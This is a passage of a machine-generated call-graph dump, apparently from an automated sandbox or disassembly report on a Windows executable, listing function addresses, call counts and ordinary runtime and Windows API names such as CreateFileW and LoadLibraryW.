_wcsupr_s 75648->75653 75648->75655 76041 7ff738a35530 72 API calls 2 library calls 75650->76041 75652 7ff738a36afa 76042 7ff738a35c10 98 API calls 2 library calls 75652->76042 75653->75655 76043 7ff738afa1fc 75653->76043 75655->75568 75660 7ff738a36b39 76057 7ff738a35500 57 API calls _wcsupr_s 75660->76057 75661 7ff738a36b54 76060 7ff738a35740 117 API calls _wcsupr_s 75661->76060 75664 7ff738a36b3e 76058 7ff738a35530 72 API calls 2 library calls 75664->76058 75666 7ff738a36b48 76059 7ff738a35c10 98 API calls 2 library calls 75666->76059 75669 7ff738a85910 _free_nolock 15 API calls 75668->75669 75670 7ff738a77018 75669->75670 76748 7ff738a859d0 75670->76748 75675 7ff738afb114 _wcsupr_s 83 API calls 75676 7ff738a77081 75675->75676 75677 7ff738a77094 75676->75677 76755 7ff738a44d00 38 API calls 2 library calls 75676->76755 75677->75568 75680 7ff738a75d50 task 15 API calls 75679->75680 75681 7ff738a76cf3 75680->75681 76769 7ff738a85dc0 75681->76769 75684 7ff738a76d7d 75687 7ff738a76dfc 75684->75687 76778 7ff738a44d00 38 API calls 2 library calls 75684->76778 75687->75568 76780 7ff738a3fa70 75688->76780 75690 7ff738a74705 75691 7ff738a3fa70 15 API calls 75690->75691 75692 7ff738a7471f wcsxfrm 75691->75692 76787 7ff738a3f980 75692->76787 75696 7ff738a748f8 76843 7ff738a45150 15 API calls 2 library calls 75696->76843 75699 7ff738a7492d 76844 7ff738a45330 15 API calls 75699->76844 75702 7ff738a74937 76845 7ff738a3c730 15 API calls _free_nolock 75702->76845 75704 7ff738a7494c _handle_error 75704->75568 75705 7ff738a747cd 75705->75696 76793 7ff738a73120 75705->76793 76816 7ff738a74550 75705->76816 76842 7ff738a45110 15 API calls 75705->76842 75708 7ff738a80377 75707->75708 75709 7ff738a80327 75707->75709 75708->75568 75709->75708 76890 7ff738abee10 75709->76890 75712 7ff738a806e3 __ExceptionPtrDestroy 75711->75712 76899 7ff738a7ec10 75712->76899 75714 7ff738a806fa __ExceptionPtrDestroy 75715 7ff738a858b0 15 API calls 75714->75715 75717 7ff738a80720 75715->75717 75716 7ff738a80778 75722 7ff738a807ec _mbsncpy_s 75716->75722 76909 7ff738a7ebb0 75716->76909 75717->75716 76912 7ff738a41050 15 API calls __ExceptionPtrDestroy 75717->76912 75720 7ff738a807bf 75721 7ff738ab0960 17 API calls 75720->75721 75721->75722 75722->75568 75724 7ff738a76b9d 75723->75724 75725 7ff738a76bae 75723->75725 75726 7ff738a75d50 task 15 API calls 75724->75726 75727 7ff738a76ba7 75725->75727 76928 7ff738a41010 15 API calls std::rsfun 75725->76928 75726->75727 76917 7ff738a75f40 75727->76917 75732 7ff738a3acbb 75731->75732 75734 7ff738a3acca 75731->75734 76934 7ff738a40600 5 API calls _free_nolock 75732->76934 76931 7ff738a3aed0 75734->76931 75737 7ff738a32ed0 75739 7ff738a430a0 75737->75739 75740 7ff738afaef8 _set_fmode 14 API calls 75739->75740 75741 7ff738a430b3 GetLastError 75740->75741 76936 7ff738a43ca0 75741->76936 75744 7ff738a43132 76946 7ff738a540a0 96 API calls _set_fmode 75744->76946 75745 7ff738a43156 75747 7ff738a4318d 75745->75747 76942 7ff738a53fc0 75745->76942 75749 7ff738a4314f 75747->75749 76947 7ff738a43a80 19 API calls _handle_error 75747->76947 75750 7ff738afaef8 _set_fmode 14 API calls 75749->75750 75752 7ff738a43294 SetLastError 75750->75752 75752->75574 75754->75575 75756 7ff738a8598f _free_nolock 75755->75756 75759 7ff738a85945 75755->75759 75758 7ff738a81768 75756->75758 75767 7ff738a41310 15 API calls __ExceptionPtrDestroy 75756->75767 75761 7ff738abeda0 75758->75761 75759->75756 75759->75758 75766 7ff738a62a30 15 API calls type_info::_name_internal_method 75759->75766 75768 7ff738abf000 GetLastError 75761->75768 75763 7ff738abedd3 75774 7ff738abf340 15 API calls 2 library calls 75763->75774 75765 7ff738a817e7 75765->75568 75766->75756 75767->75758 75775 7ff738abefa0 75768->75775 75771 7ff738abf047 75779 7ff738abee80 25 API calls 2 library calls 75771->75779 75772 7ff738abf05d SetLastError 75772->75763 75774->75765 75776 7ff738abefb8 75775->75776 75777 7ff738abefd2 LoadLibraryExA 75776->75777 75780 7ff738a63010 15 API calls std::rsfun 75776->75780 75777->75771 75777->75772 75779->75772 75780->75777 75782 7ff738a81187 75781->75782 75783 7ff738a858e5 75781->75783 75782->75603 75782->75604 75813 7ff738a41050 15 API calls __ExceptionPtrDestroy 75783->75813 75786 7ff738a4b9a5 75785->75786 75792 7ff738a4b7d8 type_info::_name_internal_method 75785->75792 75793 7ff738a4b8f6 75786->75793 75820 7ff738a40950 15 API calls strrchr 75786->75820 75788 7ff738a4b980 75814 7ff738a4c060 75788->75814 75789 7ff738a4b966 75819 7ff738a4be30 15 API calls type_info::_name_internal_method 75789->75819 75792->75788 75792->75789 75792->75793 75793->75611 75794->75607 75796 7ff738ab09be 75795->75796 75809 7ff738ab0993 75795->75809 75797 7ff738ab0b5a 75796->75797 75805 7ff738ab0a15 75796->75805 75796->75809 75798 7ff738ab0d0b 75797->75798 75806 7ff738ab0b72 75797->75806 75811 7ff738ab0dcd 75797->75811 75799 7ff738ab0d67 75798->75799 75800 7ff738ab0d1d 75798->75800 75802 7ff738ab0d79 75799->75802 75799->75806 75829 7ff738ab1780 17 API calls 3 library calls 75800->75829 75830 7ff738ab1c00 17 API calls __scrt_get_show_window_mode 75802->75830 75805->75809 75828 7ff738a518d0 15 API calls 2 library calls 75805->75828 75806->75809 75810 7ff738ab0c72 memcpy_s 75806->75810 75832 7ff738ab1550 15 API calls wcsxfrm 75806->75832 75833 7ff738aaf810 15 API calls 75809->75833 75810->75608 75811->75806 75811->75809 75831 7ff738a87200 17 API calls __ExceptionPtrDestroy 75811->75831 75813->75782 75821 7ff738a48d00 75814->75821 75816 7ff738a4c09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 75817 7ff738a4c285 75816->75817 75826 7ff738a4b310 15 API calls 3 library calls 75816->75826 75817->75793 75819->75793 75820->75793 75823 7ff738a48d45 75821->75823 75825 7ff738a58b40 10 API calls 75821->75825 75822 7ff738a48d64 75822->75816 75823->75822 75827 7ff738a40690 15 API calls 2 library calls 75823->75827 75825->75823 75826->75817 75827->75822 75828->75809 75829->75810 75830->75810 75831->75806 75832->75809 75833->75810 75835 7ff738a7ee25 75834->75835 75836 7ff738a7ee4a 75835->75836 75851 7ff738a41310 15 API calls __ExceptionPtrDestroy 75835->75851 75836->75617 75838 7ff738abdc40 75836->75838 75839 7ff738abdc70 75838->75839 75847 7ff738abddcc _handle_error _mbsncpy_s 75839->75847 75852 7ff738abde50 75839->75852 75841 7ff738abdd15 75873 7ff738a35074 75841->75873 75843 7ff738abdd4a 75844 7ff738abdd81 75843->75844 75876 7ff738a4d720 15 API calls 2 library calls 75843->75876 75877 7ff738abe6e0 15 API calls memcpy_s 75844->75877 75847->75617 75848->75622 75849->75619 75850->75618 75851->75836 75853 7ff738abdebb __scrt_get_show_window_mode 75852->75853 75865 7ff738abdf15 75853->75865 75878 7ff738abda60 15 API calls task 75853->75878 75856 7ff738abe391 75859 7ff738ab0960 17 API calls 75856->75859 75857 7ff738abe18f 75861 7ff738abe212 75857->75861 75867 7ff738abe1af 75857->75867 75879 7ff738a41010 15 API calls std::rsfun 75857->75879 75858 7ff738abe64c 75860 7ff738abe665 75858->75860 75884 7ff738a41010 15 API calls std::rsfun 75858->75884 75866 7ff738abe513 75859->75866 75860->75841 75880 7ff738abdac0 15 API calls 75861->75880 75865->75857 75865->75858 75870 7ff738abdf1c 75865->75870 75866->75841 75868 7ff738abe30d 75867->75868 75867->75870 75871 7ff738abe2c8 75867->75871 75868->75870 75882 7ff738abda60 15 API calls task 75868->75882 75870->75856 75883 7ff738a41010 15 API calls std::rsfun 75870->75883 75871->75870 75881 7ff738abda60 15 API calls task 75871->75881 75874 7ff738a3508b LoadLibraryW 75873->75874 75874->75843 75876->75844 75877->75847 75878->75865 75879->75861 75880->75867 75881->75870 75882->75870 75883->75856 75884->75860 75898 7ff738a75cb0 75885->75898 75888 7ff738a75d82 75890 7ff738a76820 75888->75890 75897 7ff738a76861 75890->75897 75891 7ff738a7691a 75892 7ff738a76920 75891->75892 75921 7ff738a44d00 38 API calls 2 library calls 75891->75921 75892->75628 75897->75891 75904 7ff738a618c0 75897->75904 75911 7ff738b0143c 75897->75911 75920 7ff738a41310 15 API calls __ExceptionPtrDestroy 75897->75920 75899 7ff738a75ccd 75898->75899 75901 7ff738a75d1a 75899->75901 75903 7ff738a41110 15 API calls 2 library calls 75899->75903 75901->75888 75902 7ff738a41010 15 API calls std::rsfun 75901->75902 75902->75888 75903->75901 75905 7ff738a61926 75904->75905 75909 7ff738a618e4 75904->75909 75906 7ff738a619ab std::rsfun 75905->75906 75908 7ff738a619cb std::rsfun 75905->75908 75905->75909 75922 7ff738a61a40 15 API calls 2 library calls 75906->75922 75908->75909 75923 7ff738a82fe0 15 API calls type_info::_name_internal_method 75908->75923 75909->75897 75912 7ff738b0145c 75911->75912 75913 7ff738b01476 75911->75913 75912->75913 75914 7ff738b01466 75912->75914 75915 7ff738b0147e 75912->75915 75913->75897 75931 7ff738afaef8 75914->75931 75924 7ff738b011ec 75915->75924 75920->75897 75921->75892 75922->75909 75923->75909 75935 7ff738ae1c78 EnterCriticalSection 75924->75935 75926 7ff738b01209 75927 7ff738b0122c 55 API calls 75926->75927 75928 7ff738b01212 75927->75928 75929 7ff738ae1c84 _fread_nolock LeaveCriticalSection 75928->75929 75930 7ff738b0121d 75929->75930 75930->75913 75936 7ff738b0ab1c GetLastError 75931->75936 75933 7ff738afaf01 75934 7ff738b08b14 23 API calls _invalid_parameter_noinfo 75933->75934 75934->75913 75937 7ff738b0ab43 75936->75937 75938 7ff738b0ab3e 75936->75938 75942 7ff738b0ab4b SetLastError 75937->75942 75960 7ff738b09828 6 API calls try_get_function 75937->75960 75959 7ff738b097e0 6 API calls try_get_function 75938->75959 75941 7ff738b0ab66 75941->75942 75961 7ff738b0921c 75941->75961 75942->75933 75946 7ff738b0ab97 75970 7ff738b09828 6 API calls try_get_function 75946->75970 75947 7ff738b0ab87 75968 7ff738b09828 6 API calls try_get_function 75947->75968 75950 7ff738b0ab9f 75951 7ff738b0aba3 75950->75951 75952 7ff738b0abb5 75950->75952 75971 7ff738b09828 6 API calls try_get_function 75951->75971 75972 7ff738b0a750 14 API calls _invalid_parameter_noinfo 75952->75972 75956 7ff738b0abbd 75973 7ff738b09294 14 API calls 2 library calls 75956->75973 75957 7ff738b0ab8e 75969 7ff738b09294 14 API calls 2 library calls 75957->75969 75960->75941 75966 7ff738b0922d wcsftime 75961->75966 75962 7ff738b0927e 75965 7ff738afaef8 _set_fmode 13 API calls 75962->75965 75963 7ff738b09262 RtlAllocateHeap 75964 7ff738b0927c 75963->75964 75963->75966 75964->75946 75964->75947 75965->75964 75966->75962 75966->75963 75974 7ff738b1addc EnterCriticalSection LeaveCriticalSection wcsftime 75966->75974 75968->75957 75969->75942 75970->75950 75971->75957 75972->75956 75973->75942 75974->75966 75979 7ff738a48037 75975->75979 75976 7ff738a4808d 76061 7ff738a44b70 75976->76061 75979->75976 76076 7ff738a3ca10 75979->76076 76082 7ff738a3c860 15 API calls 4 library calls 75979->76082 76083 7ff738a3dce0 75979->76083 75981 7ff738a48100 76072 7ff738a3b4e0 75981->76072 75982 7ff738a3ca10 task 15 API calls 75985 7ff738a480a9 75982->75985 75985->75981 75985->75982 75987 7ff738a3d5e0 wcsxfrm 15 API calls 75985->75987 75986 7ff738a4810f 75986->75639 75987->75985 75989 7ff738a3d0c0 wcsxfrm 15 API calls 75988->75989 75990 7ff738a356c5 75989->75990 75991 7ff738a3571b 75990->75991 76138 7ff738a3c860 15 API calls 4 library calls 75990->76138 76139 7ff738a3d7d0 15 API calls 3 library calls 75990->76139 75993 7ff738a3d5e0 wcsxfrm 15 API calls 75991->75993 75994 7ff738a35731 75993->75994 75994->75644 76039 7ff738a368d0 117 API calls 75994->76039 75997 7ff738a366cd 75996->75997 75998 7ff738a36872 75997->75998 75999 7ff738a36722 75997->75999 76011 7ff738a36746 75997->76011 76143 7ff738a36230 75 API calls wcsxfrm 75998->76143 76000 7ff738a3672d 75999->76000 76001 7ff738a3689e 75999->76001 76004 7ff738a3674b 76000->76004 76005 7ff738a36734 76000->76005 76144 7ff738a362c0 75 API calls _free_nolock 76001->76144 76140 7ff738a357b0 98 API calls 2 library calls 76004->76140 76006 7ff738a3673f 76005->76006 76007 7ff738a36816 76005->76007 76006->76011 76141 7ff738a35840 77 API calls 2 library calls 76006->76141 76142 7ff738a360e0 75 API calls 3 library calls 76007->76142 76011->75648 76011->75655 76012 7ff738a35d60 76011->76012 76013 7ff738a35d96 76012->76013 76145 7ff738a43f90 76013->76145 76018 7ff738a35e01 wcsxfrm 76020 7ff738a35e15 wcsxfrm 76018->76020 76021 7ff738a35e76 76018->76021 76026 7ff738a35e49 76020->76026 76168 7ff738a3cfa0 15 API calls 3 library calls 76020->76168 76022 7ff738a3b4e0 wcsxfrm 15 API calls 76021->76022 76028 7ff738a35e58 wcsxfrm 76022->76028 76025 7ff738a35e96 76169 7ff738a35300 76025->76169 76027 7ff738a3b4e0 wcsxfrm 15 API calls 76026->76027 76027->76028 76158 7ff738a35430 76028->76158 76029->75655 76030->75636 76032 7ff738a3d600 std::rsfun wcsxfrm 76031->76032 76033 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76032->76033 76034 7ff738a3d621 _free_nolock 76033->76034 76691 7ff738a4f8b0 76034->76691 76036 7ff738a3d647 task 76037 7ff738a3d654 task 76036->76037 76038 7ff738a32f9e strrchr 15 API calls 76036->76038 76037->75634 76038->76037 76039->75644 76040->75643 76041->75652 76042->75655 76044 7ff738afa205 76043->76044 76048 7ff738a36b2e 76043->76048 76045 7ff738afaef8 _set_fmode 14 API calls 76044->76045 76046 7ff738afa20a 76045->76046 76746 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76046->76746 76049 7ff738afa548 76048->76049 76050 7ff738afa551 76049->76050 76051 7ff738afa55e 76049->76051 76052 7ff738afaef8 _set_fmode 14 API calls 76050->76052 76053 7ff738afaef8 _set_fmode 14 API calls 76051->76053 76055 7ff738a36b35 76051->76055 76052->76055 76054 7ff738afa595 76053->76054 76747 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76054->76747 76055->75660 76055->75661 76057->75664 76058->75666 76059->75655 76060->75655 76087 7ff738a3b5f0 76061->76087 76063 7ff738a3b4e0 wcsxfrm 15 API calls 76070 7ff738a44b95 std::rsfun wcsxfrm _free_nolock 76063->76070 76064 7ff738a44ca8 76065 7ff738a3b4e0 wcsxfrm 15 API calls 76064->76065 76066 7ff738a44cb7 76065->76066 76066->75985 76068 7ff738a3c7a0 15 API calls _free_nolock 76068->76070 76069 7ff738a3b5f0 wcsxfrm 15 API calls 76069->76070 76070->76063 76070->76064 76070->76066 76070->76068 76070->76069 76091 7ff738a3d0c0 76070->76091 76097 7ff738a3d4e0 15 API calls 3 library calls 76070->76097 76073 7ff738a3b4f8 76072->76073 76074 7ff738a3b563 76072->76074 76073->76074 76075 7ff738a3aca0 _free_nolock 15 API calls 76073->76075 76074->75986 76074->76074 76075->76074 76077 7ff738a3ca3f task _mbsncpy_s 76076->76077 76128 7ff738a4ea50 76077->76128 76079 7ff738a3ca64 task 76080 7ff738a3cb36 76079->76080 76131 7ff738a3ad60 15 API calls _free_nolock 76079->76131 76080->75979 76082->75979 76084 7ff738a3dd0a 76083->76084 76132 7ff738a32f9e 76084->76132 76088 7ff738a3b60b wcsxfrm task 76087->76088 76089 7ff738a3b65b 76088->76089 76098 7ff738a3ad60 15 API calls _free_nolock 76088->76098 76089->76070 76092 7ff738a3d0ee _mbsncpy_s 76091->76092 76099 7ff738a4c600 76092->76099 76094 7ff738a3d15b 76094->76070 76095 7ff738a3d10b wcsxfrm 76095->76094 76103 7ff738a3ad60 15 API calls _free_nolock 76095->76103 76097->76070 76098->76089 76100 7ff738a4c619 __ExceptionPtrDestroy 76099->76100 76104 7ff738a4c5a0 76100->76104 76102 7ff738a4c67d 76102->76095 76103->76094 76107 7ff738a4dff0 76104->76107 76106 7ff738a4c5c5 wcsxfrm 76106->76102 76108 7ff738a4e0cc 76107->76108 76109 7ff738a4e00d 76107->76109 76110 7ff738a48da0 task 15 API calls 76108->76110 76109->76108 76111 7ff738a4e023 76109->76111 76114 7ff738a4e0db 76110->76114 76120 7ff738a48da0 76111->76120 76113 7ff738a4e03c 76116 7ff738a4e1c7 76113->76116 76126 7ff738a4de50 15 API calls 2 library calls 76113->76126 76114->76113 76115 7ff738a4e17d 76114->76115 76125 7ff738a40950 15 API calls strrchr 76114->76125 76118 7ff738a48d00 _free_nolock 15 API calls 76115->76118 76116->76106 76118->76113 76124 7ff738a58b40 10 API calls 76120->76124 76121 7ff738a48dd6 76122 7ff738a48ded 76121->76122 76127 7ff738a40690 15 API calls 2 library calls 76121->76127 76122->76113 76124->76121 76125->76115 76126->76116 76127->76122 76129 7ff738a48da0 task 15 API calls 76128->76129 76130 7ff738a4ea7b 76129->76130 76130->76079 76131->76080 76133 7ff738a32fab 76132->76133 76134 7ff738a3301d 76133->76134 76137 7ff738a50f90 15 API calls 2 library calls 76133->76137 76136 7ff738a32420 76137->76136 76138->75990 76139->75990 76140->76011 76141->76011 76142->76011 76143->76011 76144->76011 76177 7ff738a44050 76145->76177 76147 7ff738a35dd4 76147->76025 76148 7ff738a3cde0 76147->76148 76149 7ff738a3ce00 std::rsfun wcsxfrm 76148->76149 76150 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76149->76150 76151 7ff738a3ce21 _free_nolock 76150->76151 76647 7ff738a4f6e0 76151->76647 76153 7ff738a3ce47 76154 7ff738a3ce8a task 76153->76154 76155 7ff738a32f9e strrchr 15 API calls 76153->76155 76156 7ff738a3cf04 76154->76156 76654 7ff738a3ad60 15 API calls _free_nolock 76154->76654 76155->76154 76156->76018 76159 7ff738a3544c 76158->76159 76160 7ff738a3ca10 task 15 API calls 76159->76160 76161 7ff738a35468 wcsxfrm 76160->76161 76657 7ff738afa97c 76161->76657 76166 7ff738afa97c 17 API calls 76167 7ff738a354c8 wcsxfrm 76166->76167 76167->76025 76168->76020 76170 7ff738a3536b 76169->76170 76171 7ff738a35314 wcsxfrm 76169->76171 76170->75648 76171->76170 76689 7ff738a3c230 15 API calls 4 library calls 76171->76689 76173 7ff738a35339 76690 7ff738a35250 60 API calls _wcsupr_s 76173->76690 76175 7ff738a3535c 76176 7ff738a3b4e0 wcsxfrm 15 API calls 76175->76176 76176->76170 76178 7ff738a44083 76177->76178 76181 7ff738a440f5 _wcsupr_s 76177->76181 76205 7ff738afb114 76178->76205 76224 7ff738a43e80 76181->76224 76182 7ff738a440d9 76250 7ff738a3c990 15 API calls 2 library calls 76182->76250 76183 7ff738a440a4 76186 7ff738afaef8 _set_fmode 14 API calls 76183->76186 76188 7ff738a440a9 76186->76188 76187 7ff738a4413f 76230 7ff738afb02c 76187->76230 76248 7ff738afb448 23 API calls 3 library calls 76188->76248 76191 7ff738a440b0 76249 7ff738a3c990 15 API calls 2 library calls 76191->76249 76194 7ff738a44155 76195 7ff738afaef8 _set_fmode 14 API calls 76194->76195 76197 7ff738a4419e 76195->76197 76196 7ff738a441e3 _wcsupr_s 76198 7ff738a440cf _handle_error 76196->76198 76236 7ff738afaf9c 76196->76236 76251 7ff738afb448 23 API calls 3 library calls 76197->76251 76198->76147 76201 7ff738a441a5 76252 7ff738a3c990 15 API calls 2 library calls 76201->76252 76203 7ff738a441c7 76203->76198 76204 7ff738afaf9c _wcsupr_s 57 API calls 76203->76204 76204->76198 76206 7ff738afb058 76205->76206 76207 7ff738afb075 76206->76207 76210 7ff738afb0a1 76206->76210 76208 7ff738afaef8 _set_fmode 14 API calls 76207->76208 76209 7ff738afb07a 76208->76209 76265 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76209->76265 76211 7ff738afb0a6 76210->76211 76212 7ff738afb0b3 76210->76212 76214 7ff738afaef8 _set_fmode 14 API calls 76211->76214 76253 7ff738b0d698 76212->76253 76217 7ff738a44097 76214->76217 76217->76182 76217->76183 76218 7ff738afb0d4 76260 7ff738b0dabc 76218->76260 76219 7ff738afb0c7 76220 7ff738afaef8 _set_fmode 14 API calls 76219->76220 76220->76217 76222 7ff738afb0e8 _wcsupr_s 76266 7ff738ae1c84 LeaveCriticalSection 76222->76266 76225 7ff738a43ec6 _mbsncpy_s 76224->76225 76386 7ff738a33037 76225->76386 76227 7ff738a43f2b 76394 7ff738a573c0 76227->76394 76229 7ff738a43f41 _mbsncpy_s 76229->76187 76231 7ff738afb035 76230->76231 76232 7ff738a4414d 76230->76232 76233 7ff738afaef8 _set_fmode 14 API calls 76231->76233 76232->76194 76232->76196 76234 7ff738afb03a 76233->76234 76644 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76234->76644 76237 7ff738afafb3 76236->76237 76238 7ff738afafd1 76236->76238 76239 7ff738afaef8 _set_fmode 14 API calls 76237->76239 76246 7ff738afafc3 _wcsupr_s 76238->76246 76645 7ff738ae1c78 EnterCriticalSection 76238->76645 76241 7ff738afafb8 76239->76241 76646 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76241->76646 76242 7ff738afafe7 76244 7ff738afaf18 _wcsupr_s 55 API calls 76242->76244 76245 7ff738afaff0 76244->76245 76247 7ff738ae1c84 _fread_nolock LeaveCriticalSection 76245->76247 76246->76198 76247->76246 76248->76191 76249->76198 76250->76181 76251->76201 76252->76203 76267 7ff738b091ac EnterCriticalSection 76253->76267 76255 7ff738b0d6af 76256 7ff738b0d70c _wcsupr_s 17 API calls 76255->76256 76257 7ff738b0d6ba 76256->76257 76258 7ff738b09200 _isindst LeaveCriticalSection 76257->76258 76259 7ff738afb0bd 76258->76259 76259->76218 76259->76219 76268 7ff738b0d7f8 76260->76268 76263 7ff738b0db16 76263->76222 76265->76217 76269 7ff738b0d822 _wcsupr_s 76268->76269 76278 7ff738b0d9d5 76269->76278 76283 7ff738b1b0e4 26 API calls 3 library calls 76269->76283 76270 7ff738afaef8 _set_fmode 14 API calls 76271 7ff738b0da9b 76270->76271 76286 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76271->76286 76273 7ff738b0d9de 76273->76263 76280 7ff738b11dd8 76273->76280 76275 7ff738b0da36 76275->76278 76284 7ff738b1b0e4 26 API calls 3 library calls 76275->76284 76277 7ff738b0da57 76277->76278 76285 7ff738b1b0e4 26 API calls 3 library calls 76277->76285 76278->76270 76278->76273 76287 7ff738b11698 76280->76287 76283->76275 76284->76277 76285->76278 76286->76273 76288 7ff738b116cd 76287->76288 76289 7ff738b116af 76287->76289 76288->76289 76292 7ff738b116e9 76288->76292 76290 7ff738afaef8 _set_fmode 14 API calls 76289->76290 76291 7ff738b116b4 76290->76291 76309 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76291->76309 76298 7ff738b11cc0 76292->76298 76295 7ff738b116c0 76295->76263 76311 7ff738ae3ea8 76298->76311 76303 7ff738b11d23 76319 7ff738b04f28 76303->76319 76305 7ff738b11d7b 76307 7ff738b11714 76305->76307 76385 7ff738b09294 14 API calls 2 library calls 76305->76385 76307->76295 76310 7ff738b17978 LeaveCriticalSection 76307->76310 76309->76295 76312 7ff738ae3ecc 76311->76312 76313 7ff738ae3ec7 76311->76313 76312->76313 76314 7ff738b0a9a0 _Wcsftime 26 API calls 76312->76314 76313->76303 76384 7ff738b095a0 5 API calls try_get_function 76313->76384 76315 7ff738ae3ee7 76314->76315 76316 7ff738b0ac48 _Wcsftime 26 API calls 76315->76316 76317 7ff738ae3f0a 76316->76317 76318 7ff738b0ac7c _Wcsftime 26 API calls 76317->76318 76318->76313 76320 7ff738b04f73 76319->76320 76321 7ff738b04f51 76319->76321 76322 7ff738b04fcc 76320->76322 76323 7ff738b04f77 76320->76323 76324 7ff738b09294 __free_lconv_mon 14 API calls 76321->76324 76331 7ff738b04f5f 76321->76331 76325 7ff738b12ff4 wcsftime MultiByteToWideChar 76322->76325 76326 7ff738b04f8b 76323->76326 76327 7ff738b09294 __free_lconv_mon 14 API calls 76323->76327 76323->76331 76324->76331 76333 7ff738b04fe7 76325->76333 76328 7ff738b0a290 wcsftime 15 API calls 76326->76328 76327->76326 76328->76331 76329 7ff738b04fee GetLastError 76332 7ff738afae88 wcsftime 14 API calls 76329->76332 76330 7ff738b05027 76330->76331 76335 7ff738b12ff4 wcsftime MultiByteToWideChar 76330->76335 76331->76305 76341 7ff738b11e0c 76331->76341 76336 7ff738b04ffb 76332->76336 76333->76329 76333->76330 76334 7ff738b0501b 76333->76334 76337 7ff738b09294 __free_lconv_mon 14 API calls 76333->76337 76338 7ff738b0a290 wcsftime 15 API calls 76334->76338 76339 7ff738b0506f 76335->76339 76340 7ff738afaef8 _set_fmode 14 API calls 76336->76340 76337->76334 76338->76330 76339->76329 76339->76331 76340->76331 76342 7ff738b119f0 tmpfile 23 API calls 76341->76342 76343 7ff738b11e53 76342->76343 76344 7ff738b11e99 76343->76344 76345 7ff738b11e81 76343->76345 76346 7ff738b179a0 tmpfile 18 API calls 76344->76346 76347 7ff738afaed8 _fread_nolock 14 API calls 76345->76347 76348 7ff738b11e9e 76346->76348 76349 7ff738b11e86 76347->76349 76350 7ff738b11ebe CreateFileW 76348->76350 76351 7ff738b11ea5 76348->76351 76352 7ff738afaef8 _set_fmode 14 API calls 76349->76352 76354 7ff738b11f29 76350->76354 76355 7ff738b11fa4 GetFileType 76350->76355 76353 7ff738afaed8 _fread_nolock 14 API calls 76351->76353 76356 7ff738b11e92 76352->76356 76359 7ff738b11eaa 76353->76359 76360 7ff738b11f71 GetLastError 76354->76360 76363 7ff738b11f37 CreateFileW 76354->76363 76357 7ff738b11fb1 GetLastError 76355->76357 76358 7ff738b12002 76355->76358 76356->76305 76361 7ff738afae88 wcsftime 14 API calls 76357->76361 76367 7ff738b178b8 tmpfile 15 API calls 76358->76367 76362 7ff738afaef8 _set_fmode 14 API calls 76359->76362 76364 7ff738afae88 wcsftime 14 API calls 76360->76364 76365 7ff738b11fc0 CloseHandle 76361->76365 76362->76349 76363->76355 76363->76360 76364->76349 76365->76349 76366 7ff738b11ff2 76365->76366 76368 7ff738afaef8 _set_fmode 14 API calls 76366->76368 76369 7ff738b12024 76367->76369 76370 7ff738b11ff7 76368->76370 76371 7ff738b12074 76369->76371 76372 7ff738b11bfc tmpfile 62 API calls 76369->76372 76370->76349 76373 7ff738b1175c tmpfile 62 API calls 76371->76373 76375 7ff738b1207b 76371->76375 76372->76371 76374 7ff738b120b2 76373->76374 76374->76375 76376 7ff738b120bc 76374->76376 76377 7ff738b0d5d8 tmpfile 26 API calls 76375->76377 76376->76356 76378 7ff738b1213c CloseHandle CreateFileW 76376->76378 76377->76356 76379 7ff738b12183 GetLastError 76378->76379 76380 7ff738b121b1 76378->76380 76381 7ff738afae88 wcsftime 14 API calls 76379->76381 76380->76356 76382 7ff738b12190 76381->76382 76383 7ff738b17ae0 tmpfile 15 API calls 76382->76383 76383->76380 76384->76303 76385->76307 76401 7ff738a564e4 76386->76401 76406 7ff738a3b3d0 76386->76406 76411 7ff738a44490 76386->76411 76387 7ff738a32fd8 76389 7ff738a32ddf 76387->76389 76425 7ff738a50f90 15 API calls 2 library calls 76387->76425 76389->76227 76389->76389 76390 7ff738a32420 76638 7ff738a56f90 76394->76638 76397 7ff738a56f90 _mbsncpy_s 10 API calls 76398 7ff738a5742c 76397->76398 76641 7ff738a57010 76398->76641 76426 7ff738a9a950 76401->76426 76403 7ff738a56505 76452 7ff738a55590 76403->76452 76405 7ff738a5650f 76405->76387 76524 7ff738a48450 76406->76524 76553 7ff738a57170 76411->76553 76413 7ff738a4456d 76414 7ff738a44585 76413->76414 76415 7ff738a44574 76413->76415 76582 7ff738a66200 91 API calls 5 library calls 76414->76582 76566 7ff738a64c00 76415->76566 76418 7ff738a444cf _free_nolock 76418->76413 76580 7ff738a405a0 15 API calls 2 library calls 76418->76580 76419 7ff738a4457e 76583 7ff738a4eae0 15 API calls 76419->76583 76421 7ff738a445b6 76421->76387 76423 7ff738a4454c 76581 7ff738a40600 5 API calls _free_nolock 76423->76581 76425->76390 76427 7ff738a9a9b7 76426->76427 76462 7ff738a9a900 76427->76462 76429 7ff738a9aa15 76466 7ff738a537c0 76429->76466 76431 7ff738a9aa87 76469 7ff738a8aa20 76431->76469 76437 7ff738a9f750 5 API calls 76446 7ff738a9abb7 76437->76446 76438 7ff738a9b460 18 API calls 76438->76446 76440 7ff738a9f660 18 API calls 76440->76446 76445 7ff738a9aebf memcpy_s 76492 7ff738a9f750 76445->76492 76446->76437 76446->76438 76446->76440 76446->76445 76447 7ff738a537c0 15 API calls 76446->76447 76478 7ff738aae3a0 76446->76478 76482 7ff738a9e150 76446->76482 76488 7ff738aa21b0 76446->76488 76496 7ff738aae040 18 API calls 76446->76496 76497 7ff738aacc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76446->76497 76498 7ff738aa04a0 18 API calls 76446->76498 76499 7ff738aad4f0 18 API calls 2 library calls 76446->76499 76447->76446 76451 7ff738a9aff8 _handle_error 76451->76403 76453 7ff738a55611 76452->76453 76519 7ff738a8aa90 76453->76519 76455 7ff738a5597e 76455->76405 76456 7ff738a5583b 76456->76455 76522 7ff738aaee70 15 API calls 2 library calls 76456->76522 76458 7ff738a5589d 76458->76455 76459 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76458->76459 76460 7ff738a558e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76459->76460 76523 